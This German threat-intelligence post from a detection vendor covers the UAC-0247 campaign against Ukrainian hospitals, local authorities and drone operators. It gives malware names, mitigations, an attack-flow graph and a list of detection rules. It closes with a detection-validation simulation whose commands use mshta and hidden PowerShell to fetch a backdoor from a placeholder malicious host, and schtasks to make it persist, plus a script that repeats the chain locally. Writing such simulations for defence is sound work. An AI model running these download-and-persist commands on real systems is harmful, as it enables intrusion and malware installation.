SOC Prime Bias: Kritisch

16 Apr. 2026 14:58

UAC-0247 Zielt auf Krankenhäuser, Kommunalverwaltungen und FPV-Betreiber ab

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
UAC-0247 Zielt auf Krankenhäuser, Kommunalverwaltungen und FPV-Betreiber ab
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Zwischen März und April 2026 verzeichnete CERT-UA einen Anstieg von Cyberangriffen auf ukrainische Krankenhäuser, kommunale Behörden und FPV-Betreibergruppen. Die Aktivitäten beruhen auf Phishing-E-Mails mit schädlichen HTA- oder HTML-Links, die benutzerdefinierte Loader, die RAVENSHELL Reverse Shell und das C#-basierte AGINGFLY Remote-Access-Tool übermitteln. Weitere Nutzdaten umfassen die SILENTLOOP PowerShell-Hintertür, die CHROMELEVATOR- und ZAPIXDESK-Anmeldeinformationsdiebe und den öffentlich verfügbaren Scanner RUSTSCAN. Die Angreifer nutzen zudem DLL-Sideloading, geplante Aufgaben und eine breite Palette benutzerdefinierter Command-and-Control-Infrastrukturen.

Untersuchung

CERT-UA überprüfte dutzende Vorfälle und extrahierte Indikatoren für Kompromittierungen, darunter schädliche ausführbare Dateien, Skripte, geplante Aufgaben, IP-Adressen und Domains. Die Untersuchung deckte einen zweistufigen Loader, eine mit XOR-Verschlüsselung geschützte reverse TCP-Shell und einen auf WebSocket basierenden C2-Kanal auf, der auf einem statischen AES-CBC-Schlüssel beruht. Die Analysten dokumentierten auch den Missbrauch legitimer Windows-Dienstprogramme wie mshta.exe, powershell.exeund wscript.exe zum Starten der schädlichen HTA-Dateien.

Abschwächung

Der Bericht empfiehlt, die Ausführung von LNK-, HTA- und JavaScript-Dateien, die per E-Mail zugestellt werden, zu deaktivieren, die Nutzung von mshta.exe, powershell.exeund wscript.exeeinzuschränken und eine Applikations-Whitelist durchzusetzen. Verteidiger werden auch ermutigt, auf verdächtige Erstellung von geplanten Aufgaben und ausgehende Verbindungen zu den identifizierten Command-and-Control-Servern zu überwachen.

Reaktion

Sicherheitsteams sollten bekannte bösartige URLs und IP-Adressen umgehend blockieren, nach den aufgeführten Dateinamen und geplanten Aufgaben auf Endgeräten suchen und kompromittierte Systeme isolieren. Es sollten Erkennungsregeln für die beobachteten Befehlszeilen bereitgestellt werden, mit zusätzlichem Monitoring für AGINGFLY-bezogenen WebSocket-Verkehr. Betroffene Konten sollten sofortige Passwortzurücksetzungen durchlaufen.

"graph TB %% Klassendefinitionen classDef technique fill:#ffcc99 classDef tool fill:#c2c2f0 classDef malware fill:#ff9999 %% Knotendefinitionen initial_user_exec["<b>Technik</b> – <b>T1204.001 Benutzerausführung: Bösartiger Link</b><br/><b>Beschreibung</b>: Der Benutzer klickt auf einen bösartigen Link, der die Ausführung der Nutzlast auslöst."] class initial_user_exec technique system_binary_mshta["<b>Technik</b> – <b>T1218.005 Systembinary-Proxyausführung: Mshta</b><br/><b>Beschreibung</b>: Verwendung von mshta.exe, um schädlichen Code auszuführen."] class system_binary_mshta technique powershell_interpreter["<b>Technik</b> – <b>T1059.001 PowerShell</b><br/><b>Beschreibung</b>: PowerShell wird für die Ausführung von Befehlen und Skripten verwendet."] class powershell_interpreter technique compression_obfusc["<b>Technik</b> – <b>T1027.015 Komprimierung</b><br/><b>Beschreibung</b>: Dateien komprimieren, um schädliche Inhalte zu verbergen."] class compression_obfusc technique process_hollowing["<b>Technik</b> – <b>T1055.012 Prozessinjektion: Prozess Hollowing</b><br/><b>Beschreibung</b>: Code eines laufenden Prozesses durch schädlichen Code ersetzen."] class process_hollowing technique dll_sideload["<b>Technik</b> – <b>T1574.001 DLL-Sideloading</b><br/><b>Beschreibung</b>: Schädliche DLLs via Sideloading laden."] class dll_sideload technique appinit_dll["<b>Technik</b> – <b>T1546.010 AppInit DLLs</b><br/><b>Beschreibung</b>: Schädliche DLLs im AppInit_DLLs-Schlüssel zur Ausführung registrieren."] class appinit_dll technique agingfly_tool["<b>Werkzeug</b> – <b>Name</b>: AGINGFLY<br/><b>Typ</b>: Remote-Access-Tool"] class agingfly_tool tool websocket_c2["<b>Technik</b> – <b>T1071.001 WebSocket C2</b><br/><b>Beschreibung</b>: Nutzung des WebSocket-Protokolls für Kommando- und Kontrollkommunikationen."] class websocket_c2 technique xmrig_malware["<b>Malware</b> – <b>Name</b>: XMRIG<br/><b>Zweck</b>: Krypto-Mining (Rechnerentführung)"] class xmrig_malware malware rustscan_tool["<b>Werkzeug</b> – <b>Name</b>: Rustscan<br/><b>Funktion</b>: Netzwerkerkennungsdienst"] class rustscan_tool tool lateral_transfer["<b>Technik</b> – <b>T1570 Seitliche Werkzeugübertragung</b><br/><b>Beschreibung</b>: Werkzeuge zu entfernten Systemen für seitliche Bewegung übertragen."] class lateral_transfer technique ingress_transfer["<b>Technik</b> – <b>T1105 Eingriffs-Werkzeugübertragung</b><br/><b>Beschreibung</b>: Werkzeuge/Dateien in die angegriffene Umgebung übertragen."] class ingress_transfer technique chromelevet_tool["<b>Werkzeug</b> – <b>Name</b>: ChromeLevetor<br/><b>Zweck</b>: Anmeldeinformationen aus Chrome-Browsern extrahieren"] class chromelevet_tool tool reflective_obfusc["<b>Technik</b> – <b>T1027 Verschleierte Dateien oder Informationen</b><br/><b>Beschreibung</b>: Reflektierende Ladung und eingebettete Nutzlasten nutzen, um schädlichen Code zu verbergen."] class reflective_obfusc technique scheduled_tasks["<b>Technik</b> – <b>T1059.003 Windows-Befehlszeile (Geplante Aufgaben)</b><br/><b>Beschreibung</b>: Geplante Aufgaben über die Befehlszeile ausführen."] class scheduled_tasks technique %% Verbindungen initial_user_exec –>|führt zu| system_binary_mshta system_binary_mshta –>|führt aus| powershell_interpreter powershell_interpreter –>|verschleiert| compression_obfusc compression_obfusc –>|injiziert| process_hollowing process_hollowing –>|lädt| dll_sideload dll_sideload –>|löst aus| appinit_dll appinit_dll –>|installiert| agingfly_tool agingfly_tool –>|kommuniziert über| websocket_c2 websocket_c2 –>|kontrolliert| xmrig_malware xmrig_malware –>|entdeckt Netzwerke via| rustscan_tool rustscan_tool –>|ermöglicht| lateral_transfer lateral_transfer –>|erleichtert| ingress_transfer ingress_transfer –>| stiehlt | chromelevet_tool chromelevet_tool –>| ermöglicht | reflective_obfusc reflective_obfusc –>| plant | scheduled_tasks "

Angriffsfluss

Erkennungen

Mögliche bösartige LNK-Datei mit doppelter Erweiterung (über cmdline)

SOC Prime-Team
15. Apr 2026

Powershell, das Datei in verdächtigem Verzeichnis unter Umgehung der Ausführungsrichtlinie ausführt (über cmdline)

SOC Prime-Team
15. Apr 2026

Herunterladen oder Hochladen über Powershell (über cmdline)

SOC Prime-Team
15. Apr 2026

Mögliche Ausführung durch Verwendung eines kurzen Skriptnamens (über cmdline)

SOC Prime-Team
15. Apr 2026

Kurzer Dateiname (über cmdline)

SOC Prime-Team
15. Apr 2026

Schtasks zeigt auf verdächtiges Verzeichnis/ Binärdatei/ Skript (über cmdline)

SOC Prime-Team
15. Apr 2026

OneDrive-Binärdatei aus ungewöhnlichem Verzeichnis ausgeführt (über process_creation)

SOC Prime-Team
15. Apr 2026

Ungewöhnliche Erweiterung der ausführbaren Binärdatei (über process_creation)

SOC Prime-Team
15. Apr 2026

LOLBAS WScript / CScript (über process_creation)

SOC Prime-Team
15. Apr 2026

Verdächtiges LOLBAS MSHTA-Verteidigungsumgehungsverhalten durch Erkennung der zugehörigen Befehle (über process_creation)

SOC Prime-Team
15. Apr 2026

LOLBAS Conhost (über cmdline)

SOC Prime-Team
15. Apr 2026

Mögliche Nutzung eines Tunneling-Tools [Windows] (über cmdline)

SOC Prime-Team
15. Apr 2026

Verdächtige CURL-Nutzung (über cmdline)

SOC Prime-Team
15. Apr 2026

Mögliche Erstellung geplanter Aufgaben (über powershell)

SOC Prime-Team
15. Apr 2026

Call Suspicious .NET-Methoden von Powershell (über powershell)

SOC Prime-Team
15. Apr 2026

Möglicher Missbrauch von Telegram als Kommando- und Kontrollkanal (über dns_query)

SOC Prime-Team
15. Apr 2026

Verdächtige Prozess-DNS-Abfrage bekannter Missbrauchs-Webdienste (über Netzwerkverbindung)

SOC Prime-Team
15. Apr 2026

Verdächtiger Dateidownload über direkte IP (über proxy)

SOC Prime-Team
15. Apr 2026

Verdächtige Kommando- und Kontrolloperation durch Anfragen an Out-of-Band-Interaktionsdomäne (über dns)

SOC Prime-Team
15. Apr 2026

Verdächtige Kommando- und Kontrolloperation durch DNS-Anfrage an ungewöhnliche Top-Level-Domain (TLD) (über dns)

SOC Prime-Team
15. Apr 2026

IOCs (HashSha256), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 4

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashSha256), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 3

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashSha256), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 2

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashSha256), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 1

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashSha1), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashMd5), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 4

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashMd5), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 3

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashMd5), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 2

SOC Prime KI-Regeln
15. Apr 2026

IOCs (HashMd5), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247 Teil 1

SOC Prime KI-Regeln
15. Apr 2026

IOCs (SourceIP), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247

SOC Prime KI-Regeln
15. Apr 2026

IOCs (DestinationIP), um zu erkennen: Krankenhäuser, kommunale Behörden und FPV-Operatoren – Fokus des Cyber-Bedrohungsclusters UAC-0247

SOC Prime KI-Regeln
15. Apr 2026

Erkennung bösartiger Domänen und C2-Kommunikation durch UAC-0247 [Windows-Netzwerkverbindung]

SOC Prime KI-Regeln
15. Apr 2026

Bösartige Ausführung über Mshta und Powershell mit geplanten Aufgaben [Windows-Prozesserstellung]

SOC Prime KI-Regeln
15. Apr 2026

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien-Vorflug-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die zur Aktivierung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und versuchen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:

    Ein Angreifer hat sich einen ersten Zugang zu einer kompromittierten Workstation verschafft. Um die Persistenz aufrechtzuerhalten und weitere Nutzdaten auszuführen, während er klassische AV umgeht, nutzt der Angreifer:

    1. Verwendet mshta.exe zum Herunterladen und Ausführen einer bösartigen HTA-Datei, die eine PowerShell-One-Liner enthält.
    2. Der PowerShell-One-Liner lädt eine Hintertür-Binärdatei von einem Remote-Server herunter und speichert sie in %TEMP%.
    3. Erstellt eine geplante Aufgabe (schtasks /Create /SC MINUTE /MO 10die die Hintertür alle zehn Minuten ausführt und so eine kontinuierliche Ausführung auch nach einem Neustart sicherstellt.

    Die genauen Befehle, die auf dem kompromittierten Host ausgeführt werden, sind:

    :: Schritt 1 – mshta herunterladen & starten
    mshta.exe "http://bösartig.beispiel.com/nutzlast.hta"
    
    :: Schritt 2 – PowerShell eingebettet in die HTA (hier direkt simuliert)
    powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
      -Command "(New-Object System.Net.WebClient).DownloadFile('http://bösartig.beispiel.com/hintertür.exe',$env:TEMP+'hintertür.exe')"
    
    :: Schritt 3 – Geplante Aufgabe für Persistenz
    schtasks /Create /SC MINUTE /MO 10 /TN "Updater" /TR "%TEMP%hintertür.exe"
  • Regressionstest-Skript: Das folgende PowerShell-Skript automatisiert die gesamte Angriffskette und reproduziert die genaue Telemetrie, die erforderlich ist, damit die Regel anschlägt.

    #================================================================
    # Regressionstest – Sigma-Regel für mshta + PowerShell + schtasks auslösen
    #================================================================
    
    # 1. URLs und Pfade definieren (benutzen Sie Test-Server im Labor)
    $htaUrl       = "http://127.0.0.1:8080/nutzlast.hta"
    $payloadUrl   = "http://127.0.0.1:8080/hintertür.exe"
    $tempPath     = "$env:TEMPhintertür.exe"
    $taskName     = "Updater"
    
    # 2. mshta-Ausführung simulieren (lädt das HTA – hier rufen wir einfach mshta auf)
    Write-Host "[*] Führe mshta.exe aus"
    Start-Process -FilePath "mshta.exe" -ArgumentList "`"$htaUrl`"" -NoNewWindow -Wait
    
    # 3. PowerShell-One-Liner ausführen, um die Hintertür herunterzuladen
    Write-Host "[*] Hintertür über PowerShell herunterladen"
    $psCmd = "(New-Object System.Net.WebClient).DownloadFile('$payloadUrl','$tempPath')"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command `$psCmd`" -NoNewWindow -Wait
    
    # 4. Geplante Aufgabe erstellen (10-Minuten-Intervall)
    Write-Host "[*] Geplante Aufgabe für Persistenz erstellen"
    $schtasksArgs = "/Create /SC MINUTE /MO 10 /TN `"$taskName`" /TR `"$tempPath`" /F"
    Start-Process -FilePath "schtasks.exe" -ArgumentList $schtasksArgs -NoNewWindow -Wait
    
    Write-Host "[+] Angriffssimulation abgeschlossen. Überprüfen Sie das SIEM auf den Alarm."
  • Bereinigungskommandos: Nach der Validierung entfernen Sie die erstellten Artefakte, um den Host in einen sauberen Zustand zurückzusetzen.

    # Geplante Aufgabe löschen
    schtasks /Delete /TN "Updater" /F
    
    # Hintertür-Binärdatei entfernen
    Remove-Item -Path "$env:TEMPhintertür.exe" -Force
    
    # (Optional) Alle Test-HTA-Dateien löschen, falls diese lokal gespeichert wurden
    # Remove-Item -Path "$env:TEMPnutzlast.hta" -Force